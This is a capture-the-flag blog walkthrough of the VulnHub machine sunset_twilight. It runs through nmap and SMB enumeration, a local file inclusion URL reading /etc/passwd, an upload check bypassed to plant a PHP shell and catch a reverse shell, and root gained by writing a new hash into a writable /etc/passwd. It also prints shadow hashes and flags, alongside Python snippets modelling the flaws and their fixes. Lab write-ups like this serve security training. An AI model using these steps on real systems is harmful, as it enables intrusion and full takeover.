sunset_twilight box (VulnHub machine)


Information gathering

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.133
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-03 09:33 EDT
Nmap scan report for 192.168.56.133
Host is up (0.00010s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2121/tcp open ccproxy-ftp
3306/tcp open mysql
8080/tcp open http-proxy
63525/tcp open unknown
MAC Address: 08:00:27:64:77:9F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

Quite a few ports are open, so there may well be some rabbit holes.

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo nmap -sT -sV -sC -O -p22,25,80,139,445,2121,3306,8080,63525 192.168.56.133
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-03 09:35 EDT
Nmap scan report for 192.168.56.133
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
| 256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
|_ 256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
25/tcp open smtp Exim smtpd 4.92
| smtp-commands: twilight Hello nmap.scanme.org [192.168.56.106], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 35 Jul 16 2020 22253251-65325.twilight
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.133:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
| Thread ID: 39
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, FoundRows, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: f&&*BM;})N.9s\P^ea7/
|_ Auth Plugin Name: mysql_native_password
8080/tcp open http PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Login - powered by Easy File Sharing Web Server
63525/tcp open http PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
MAC Address: 08:00:27:64:77:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: twilight; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: twilight
| NetBIOS computer name: TWILIGHT\x00
| Domain name: \x00
| FQDN: twilight
|_ System time: 2023-08-03T09:36:22-04:00
|_nbstat: NetBIOS name: TWILIGHT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-08-03T13:36:22
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.69 seconds

Summary of what we have: Debian operating system; SMTP mail service; SMB on 139 and 445; FTP on 2121 allowing anonymous login, but with only a single file; MySQL; web services on 80, 8080 and 63525.

SMB enumeration

Check whether the SMB service exposes any shares

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo smbmap -H 192.168.56.133
[sudo] password for kali:
[+] IP: 192.168.56.133:445 Name: 192.168.56.133
Disk Permissions Comment
---- ----------- -------
WRKSHARE READ ONLY Workplace Share. Do not access if not an employee.
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)

Connect to the WRKSHARE share

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ smbclient //192.168.56.133/WRKSHARE
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 8 18:57:09 2020
.. D 0 Wed Jul 8 18:57:09 2020
root D 0 Thu Jul 16 09:50:46 2020
run D 0 Thu Aug 3 09:29:50 2023
lost+found D 0 Wed Jul 8 18:08:46 2020
initrd.img N 25814661 Wed Jul 8 18:58:16 2020
etc D 0 Thu Jul 16 09:54:54 2020
proc D 0 Thu Aug 3 09:29:52 2023
vmlinuz N 5274864 Sun Jun 7 11:42:22 2020
initrd.img.old N 25807574 Wed Jul 8 18:58:02 2020
opt D 0 Wed Jul 8 18:09:01 2020
srv D 0 Wed Jul 8 18:09:01 2020
sys D 0 Thu Aug 3 09:36:49 2023
lib64 D 0 Wed Jul 8 18:09:08 2020
sbin D 0 Thu Jul 16 09:53:39 2020
media D 0 Wed Jul 8 18:08:46 2020
bin D 0 Thu Jul 16 08:22:20 2020
usr D 0 Wed Jul 8 18:09:01 2020
lib32 D 0 Wed Jul 8 18:08:56 2020
dev D 0 Thu Aug 3 09:29:44 2023
lib D 0 Wed Jul 8 22:20:29 2020
vmlinuz.old N 5274864 Mon Apr 27 01:05:39 2020
libx32 D 0 Wed Jul 8 18:08:56 2020
home D 0 Wed Jul 8 19:15:56 2020
mnt D 0 Wed Jul 8 18:09:01 2020
var D 0 Wed Jul 8 20:03:27 2020
boot D 0 Wed Jul 8 19:06:53 2020
tmp D 0 Thu Aug 3 09:34:44 2023

7158264 blocks of size 1024. 4447488 blocks available

It looks like the share is the root of the filesystem, which effectively gives us basic read access to the whole filesystem (and possibly upload as well).

Looking into the home directory revealed a user miguel, but we have no permission to read that user's home directory.

Next, let's look at the web root.

smb: \var\www\html\> ls
. D 0 Thu Jul 16 09:43:26 2020
.. D 0 Wed Jul 15 21:44:37 2020
current.php N 152 Wed Jul 15 21:58:35 2020
lang.php N 58 Wed Jul 15 22:03:45 2020
gallery D 0 Wed Jul 8 22:31:53 2020
index.php N 228 Wed Jul 15 22:03:51 2020

7158264 blocks of size 1024. 4447472 blocks available

Download each of these files locally, then review the code while comparing it against what the browser shows.

Local file inclusion

lang.php is the interesting one; its code is shown below

<?php

$lang = $_GET['lang'];

include('./' . $lang);

?>

This should be a file inclusion, so try a local file inclusion and build a PoC

http://192.168.56.133/lang.php?lang=../../../../../../../etc/passwd

It can indeed read the passwd file, but not the shadow file.
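The traversal in lang.php and the fix a defender would apply, modelled in Python as an added example (not code from the box or from the original post); WEBROOT, ALLOWED_LANGS and the lang/<code>.php layout are assumptions:

```python
import os
import re
from typing import Optional

# Web root of the gallery site on the box (assumed value for this model).
WEBROOT = "/var/www/html"

# Languages the page may load. The original lang.php has no such list;
# this allowlist is the added control.
ALLOWED_LANGS = {"en", "es", "zh"}


def unsafe_include_target(lang: str, webroot: str = WEBROOT) -> str:
    """Model of include('./' . $lang): the path the PHP code would open.

    There is no validation, so '..' segments simply walk out of the web root.
    """
    return os.path.normpath(os.path.join(webroot, "./" + lang))


def safe_include_target(lang: str, webroot: str = WEBROOT) -> Optional[str]:
    """Hardened resolver: allowlist the parameter, then re-check containment.

    Returns the path to include, or None when the request must be refused.
    """
    # 1. Structural check: a short bare token, no slashes, dots or NUL bytes.
    if not re.fullmatch(r"[a-z]{2,5}", lang):
        return None
    # 2. Allowlist: map the token onto a file we actually ship.
    if lang not in ALLOWED_LANGS:
        return None
    candidate = os.path.normpath(os.path.join(webroot, "lang", lang + ".php"))
    # 3. Defence in depth: the normalised path must still sit under the web
    #    root (on a live system use os.path.realpath so symlinks resolve too).
    if os.path.commonpath([webroot, candidate]) != webroot:
        return None
    return candidate
```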

File upload

The gallery folder is the file upload area; it looks like this in the browser

A quick code review of the files downloaded over SMB finds the upload type check at line 117 of maxImageUpload.class.php

//Check image type. Only jpeg images are allowed
if ( (($_FILES['myfile']['type'])=='image/pjpeg') || (($_FILES['myfile']['type'])=='image/jpeg')) {

It only checks the Content-Type, so we can upload a genuine jpg file, intercept the request with Burp Suite, and change the file name and file content in it.
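A Python model of the line-117 check above beside a hardened validator that decides by file bytes rather than the client-supplied Content-Type, added here as an example (not code from maxImageUpload.class.php); the sample request values are constructed:

```python
import secrets
from typing import Optional

JPEG_MAGIC = b"\xff\xd8\xff"  # every JPEG (JFIF/Exif) file begins with these bytes


def passes_original_check(content_type: str) -> bool:
    """The line-117 check from maxImageUpload.class.php, modelled in Python.

    content_type is the Content-Type of the multipart part, a value the client
    chooses, so on its own it proves nothing about the file's bytes.
    """
    return content_type in ("image/pjpeg", "image/jpeg")


def validate_jpeg_upload(content_type: str, data: bytes) -> Optional[str]:
    """Hardened check. Returns the server-chosen file name, or None to reject.

    The client-supplied file name is deliberately not a parameter: the server
    picks both the name and the extension.
    """
    if not passes_original_check(content_type):
        return None
    # Decide by content: a JPEG must start with the SOI marker bytes.
    if not data.startswith(JPEG_MAGIC):
        return None
    # Cheap polyglot guard: a real image has no reason to carry a PHP open tag
    # (e.g. inside an EXIF comment). Re-encoding the image server-side is stronger.
    if b"<?php" in data or b"<?=" in data:
        return None
    # Random name with a fixed extension, so nothing stored ever ends in .php.
    return secrets.token_hex(8) + ".jpg"


# Constructed samples (not captured from the box).
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16 + b"\xff\xd9"
PHP_FILE = b"<?php echo 'hello'; ?>\n"
POLYGLOT = REAL_JPEG[:12] + b"<?php echo 1; ?>" + REAL_JPEG[12:]
```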

The response body shows the name of the successfully uploaded file; back in the smb client we can find the file's path.

smb: \var\www\html\gallery\> cd original
smb: \var\www\html\gallery\original\> ls
. D 0 Thu Aug 3 21:54:42 2023
.. D 0 Wed Jul 8 22:31:53 2020
sandwich.jpg N 171858 Thu Aug 3 21:53:06 2023
espresso.jpg N 170467 Thu Aug 3 21:53:17 2023
shell.php N 3611 Thu Aug 3 21:54:42 2023

Try accessing http://192.168.56.133/gallery/original/shell.php directly; if that does not work, it can be combined with the local file inclusion found earlier.

Reverse shell

With a listener started beforehand, visiting the link gives us a reverse shell

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.133] 49904
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
21:55:35 up 12:25, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:64:77:9f brd ff:ff:ff:ff:ff:ff
inet 192.168.56.133/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 433sec preferred_lft 433sec
inet6 fe80::a00:27ff:fe64:779f/64 scope link
valid_lft forever preferred_lft forever
$ uname -a
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/$

Privilege escalation

Trying the home directory again, miguel's home is still inaccessible, so we do some basic enumeration

www-data@twilight:/var/www/html/gallery$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Nothing useful in the cron jobs

www-data@twilight:/var/www/html/gallery$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:115::/var/spool/exim4:/usr/sbin/nologin
mysql:x:108:118:MySQL Server,,,:/nonexistent:/bin/false

We had already read passwd through the local file inclusion; it contains no passwords or other useful information.

What about SUID files?

www-data@twilight:/var/www/html/gallery$ find / -type f -perm -04000 -ls 2>/dev/null
<allery$ find / -type f -perm -04000 -ls 2>/dev/null
146212 1156 -rwsr-xr-x 1 root root 1181384 May 13 2020 /usr/sbin/exim4
131131 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
131136 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
131134 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
131132 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
135085 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
135083 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
145984 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
134602 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
134749 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
135376 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
145807 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
268427 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
277300 12 -rwsrwxrwx 1 www-data www-data 10854 Dec 28 2010 /var/www/html/gallery/maxImageUpload.zip
277312 4 -rwsrwxrwx 1 www-data www-data 534 Mar 19 2008 /var/www/html/gallery/readme.txt
277308 4 -rwsrwxrwx 1 root root 1286 Nov 27 2007 /var/www/html/gallery/style/images/ok.gif
277304 4 -rwsrwxrwx 1 root root 455 Nov 27 2007 /var/www/html/gallery/style/images/header_bg.gif
277306 4 -rwsrwxrwx 1 root root 579 Nov 27 2007 /var/www/html/gallery/style/images/header_right.gif
277303 4 -rwsrwxrwx 1 root root 511 Nov 27 2007 /var/www/html/gallery/style/images/button.gif
277305 4 -rwsrwxrwx 1 root root 1581 Nov 27 2007 /var/www/html/gallery/style/images/header_left.gif
277307 4 -rwsrwxrwx 1 root root 1333 Nov 27 2007 /var/www/html/gallery/style/images/nok.gif
277309 4 -rwsrwxrwx 1 root root 3191 Nov 27 2007 /var/www/html/gallery/style/style.css
277310 12 -rwsrwxrwx 1 www-data www-data 8916 Mar 19 2008 /var/www/html/gallery/maxImageUpload.class.php
277311 4 -rwsrwxrwx 1 www-data www-data 601 Mar 18 2008 /var/www/html/gallery/index.php

Some of the SUID files are even readable, writable and executable by everyone, so let's try writing /bin/bash into one of them

www-data@twilight:/tmp$ echo '/bin/bash'> /var/www/html/gallery/style/style.css
< '/bin/bash'> /var/www/html/gallery/style/style.css
www-data@twilight:/tmp$ ls -alih /var/www/html/gallery/style/style.css
ls -alih /var/www/html/gallery/style/style.css
277309 -rwxrwxrwx 1 root root 10 Aug 3 23:26 /var/www/html/gallery/style/style.css

Something very odd happened: the SUID file's s bit disappeared. I asked ChatGPT about it

Still unclear; I tried the same on another file and the SUID bit vanished again, so we need to look for a different attack path. (This is expected behaviour: the Linux kernel clears the setuid and setgid bits whenever a process without CAP_FSETID writes to the file, and a .css file is not an executable binary in any case, so a world-writable SUID file is a dead end here.)

Try logging in to MySQL without a password

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ mysql -u root -h 192.168.56.133 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 55
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)

Nothing of interest among the databases. Try the anonymous FTP login; there really is only that one file. Download it and open it

It looks like garbage rather than meaningful characters; set it aside for now

After poking around various files without any leads, use linpeas to help with enumeration

The interesting findings are collected below

Sudo version 1.8.27

[CVE-2019-13272] PTRACE_TRACEME
Exposure: highly probable

/usr/bin/crontab
@reboot /usr/bin/php -S 0.0.0.0:8080 -t /var/tmp/efs
@reboot /usr/bin/python -m pyftpdlib -w -p 2121 -d /var/tmp/ftp


Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

/var/lib/samba/private/secrets.tdb

passwd file: /etc/pam.d/passwd
passwd file: /usr/share/lintian/overrides/passwd

-rw-r--r-- 1 root root 69 Jul 5 2020 /etc/php/7.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jul 5 2020 /usr/share/php7.3-common/common/ftp.ini

/etc/passwd is writable

root:$6$ToxjigfMAQqy04Ju$KWxn7uPKThd8Aq7DDzmc4UP9/s70E1NF3ouxchGaEsmYF7mekSHrD.ffKkGjLC1gp1nkfq/Z1.O2tH12SehhM1:18451:0:99999:7:::
miguel:$6$B45OA9E8qgti4kkO$d8d7szJSGY9x5x5tSzyggQkKK0Zx.dEksrxg33JcFGJqW2S1K9lQlhU56Q4Y3RI9/m4Gra78Cidi1C6dqvJpe1:18451:0:99999:7:::

At first I did not notice that the passwd file was writable and focused on the shadow hashes instead; john cracked them to the username as the password, but both ssh login and su reported a wrong password

I also tried reading the shadow file directly, which failed with permission denied, so I am not sure how linpeas obtained those hashes.

Privilege escalation via writable passwd

Going over the linpeas output again, I finally noticed the hint that passwd is writable, so we can generate a password hash locally and write it into the passwd file

First back up the existing passwd file

www-data@twilight:/tmp$ cp /etc/passwd /tmp/passwd.bak
cp /etc/passwd /tmp/passwd.bak

Generate the password hash with the openssl command

www-data@twilight:/tmp$ openssl passwd 123456
openssl passwd 123456
5vz6eychoQ1Vc

This gives the entry root:5vz6eychoQ1Vc:0:0:root:/root:/bin/bash. Because the shell is barely interactive I got the edit wrong once, and the backup came in handy. After writing it in, su root with the chosen password 123456 logs in successfully
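The same weakness seen from the defender's side: an added Python audit (not from the original post) that flags what this escalation leaves behind in /etc/passwd, namely a writable file, a hash in the second field (which login accepts without consulting shadow) and a second UID-0 entry. The sample content is constructed from the passwd lines shown on this page.

```python
import os
import stat
from typing import List

# Constructed sample: a few of the box's original passwd lines plus the entry
# the walkthrough appends (root with a DES crypt hash stored in passwd itself).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
root:5vz6eychoQ1Vc:0:0:root:/root:/bin/bash
"""


def audit_passwd(text: str, mode: int) -> List[str]:
    """Return findings for a passwd file's content and its permission bits.

    Flags: a group- or world-writable file, an entry whose password field is a
    real hash instead of 'x' (bypasses shadow), an empty password field,
    duplicated usernames, and more than one UID-0 account.
    """
    findings: List[str] = []
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    uid0: List[str] = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append(f"line {lineno}: duplicate user {name}")
        seen.add(name)
        if pw == "":
            findings.append(f"line {lineno}: empty password for {name}")
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(f"line {lineno}: password hash stored in passwd for {name}")
        if uid == "0":
            uid0.append(name)
    if len(uid0) > 1:
        findings.append("multiple UID 0 accounts: " + ", ".join(uid0))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[str]:
    """Audit the real file on a host (reads it and its mode bits)."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return audit_passwd(text, os.stat(path).st_mode)
```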

www-data@twilight:/tmp$ su root
su root
Password: 123456

root@twilight:/tmp# whoami
whoami
root
root@twilight:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@twilight:/tmp# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:64:77:9f brd ff:ff:ff:ff:ff:ff
inet 192.168.56.133/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 373sec preferred_lft 373sec
inet6 fe80::a00:27ff:fe64:779f/64 scope link
valid_lft forever preferred_lft forever
root@twilight:/tmp# uname -a
uname -a
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

Grab the flags

root@twilight:~# ls
ls
root.txt
root@twilight:~# cat root.txt
cat root.txt
(\
\'\
\'\ __________
/ '| ()_________)
\ '/ \ ~~~~~~~~ \
\ \ ~~~~~~ \
==). \__________\
(__) ()__________)


34d3ecb1bbd092bcb87954cee55d88d3

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@twilight:~# cd /home/
cd /home/
root@twilight:/home# ls
ls
miguel
root@twilight:/home# cd miguel
cd miguel
root@twilight:/home/miguel# ls
ls
efs efs2 ftp user.txt
root@twilight:/home/miguel# cat user.txt
cat user.txt
6b963e69f7b4a6205513973e4cace702

https://i3eg1nner.github.io/2023/08/a7cba4fd2f05.html
Author: I3eg1nner
Published: 4 August 2023